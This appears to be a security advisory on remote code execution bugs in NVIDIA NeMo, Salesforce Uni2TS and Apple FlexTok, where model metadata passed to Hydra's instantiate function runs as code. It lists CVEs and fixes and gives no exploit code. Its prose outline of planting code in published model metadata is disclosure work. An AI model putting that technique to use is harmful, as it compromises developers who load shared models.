Remote Code Execution With Modern AI/ML Formats and Libraries
Executive Summary:
We identified vulnerabilities in three open-source artificial intelligence/machine learning (AI/ML) Python libraries published by Apple, Salesforce, and NVIDIA on their GitHub repositories. Vulnerable versions of these libraries allow for remote code execution (RCE) when a model file with malicious metadata is loaded. These libraries are used in popular models on HuggingFace with tens of millions of downloads in total.
Vulnerable Libraries:
- NeMo (https://github.com/NVIDIA-NeMo/NeMo/tree/main): A PyTorch-based framework created for research purposes that is designed for the development of diverse AI/ML models and complex systems created by NVIDIA.
- Uni2TS (https://github.com/SalesforceAIResearch/uni2ts): A PyTorch library created for research purposes that is used by Salesforce's Morai, a foundation model for time series analysis that forecasts trends from vast datasets.
- FlexTok (https://github.com/apple/ml-flextok): A Python-based framework created for research purposes that enables AI/ML models to process images by handling the encoding and decoding functions, created by researchers at Apple and the Swiss Federal Institute of Technology’s Visual Intelligence and Learning Lab.
Vulnerabilities:
The vulnerabilities stem from libraries using metadata to configure complex models and pipelines, where a shared third-party library instantiates classes using this metadata. Vulnerable versions of these libraries simply execute the provided data as code. This allows an attacker to embed arbitrary code in model metadata, which would automatically execute when vulnerable libraries load these modified models.
Mitigation and Protection:
As of December 2025, we have found no malicious examples using these vulnerabilities in the wild. Palo Alto Networks notified all affected vendors in April 2025 to ensure they had a chance to implement mitigations or resolve the issues before publication.
- NVIDIA: Issued CVE-2025-23304 (https://nvidia.custhelp.com/app/answers/detail/a_id/5686), rated High severity, and released a fix in NeMo version 2.3.2.
- FlexTok Researchers: Updated their code in June 2025 to resolve the issues.
- Salesforce: Issued CVE-2026-22584 (https://help.salesforce.com/s/articleView?id=005239354&type=1), rated High severity, and deployed a fix on July 31, 2025.
These vulnerabilities were discovered by Prisma AIRS (https://www.paloaltonetworks.com/prisma/prisma-ai-runtime-security), which is able to identify models leveraging these vulnerabilities and extract their payloads.
Palo Alto Networks customers are better protected from the threats discussed above through the following products and services:
- Cortex Cloud’s Vulnerability Management (https://www.paloaltonetworks.com/cortex/cloud/vulnerability-management): Identifies and manages base images for cloud virtual machine and containerized environments.
- Unit 42 AI Security Assessment (https://www.paloaltonetworks.com/resources/datasheets/unit-42-ai-security-assessment): Helps organizations reduce AI adoption risk, secure AI innovation, and strengthen AI governance.
Technical Analysis:
While newer formats have removed the ability to store model state and configurations as code, researchers still have use cases for serializing that information. Because these libraries are large and the configurations of their classes can be complex, many libraries use third-party tools to accomplish this.
Hydra:
Hydra (https://hydra.cc/) is a Python library maintained by Meta that is a tool commonly used to serialize model state and configuration information. All the vulnerabilities we identified use the hydra.utils.instantiate() function, which is intended to "instantiate different implementations of an interface."
NeMo:
NVIDIA has been developing the NeMo library since 2019, as a "scalable and cloud-native generative AI framework." NeMo uses its own file formats with the .nemo and .qnemo file extensions, which are simply TAR files containing a model_config.yaml file that stores model metadata along with a .pt file or a .safetensors file, respectively.
Uni2TS:
In 2024, Salesforce’s AI research team published an article titled "Unified Training of Universal Time Series Transformers" (https://arxiv.org/abs/2402.02592), which introduced a set of models that were published on HuggingFace (https://huggingface.co/collections/Salesforce/moirai-r-models-65c8d3a94c51428c300e0742). This research and the use of these models depend on uni2TS, an open-source Python library that accompanied the Salesforce article.
FlexTok:
Early in 2025, Apple and the Swiss Federal Institute of Technology’s Visual Intelligence and Learning Lab (EPFL VILAB) published research (https://arxiv.org/abs/2502.13967) that introduced a supporting Python library called ml-flextok. Like uni2TS, ml-flextok works exclusively with the safetensors format and extends PyTorchModelHubMixin.
Conclusion:
Palo Alto Networks has not identified any model files leveraging these vulnerabilities for attacks in the wild. However, there is ample opportunity for attackers to leverage them. It is common for developers to create their own variations of state-of-the-art models with different fine-tunings and quantizations, often from researchers unaffiliated with any reputable institution. Attackers would just need to create a modification of an existing popular model, with either a real or claimed benefit, and then add malicious metadata.
Additional Resources:
- Hydra documentation (https://hydra.cc/)
- NeMo source code (https://github.com/NVIDIA/NeMo/tree/main)
- uni2ts source code (https://github.com/SalesforceAIResearch/uni2ts)
- ml-flextok source code (https://github.com/apple/ml-flextok)
- Libraries of NeMo models (https://huggingface.co/models?library=nemo)
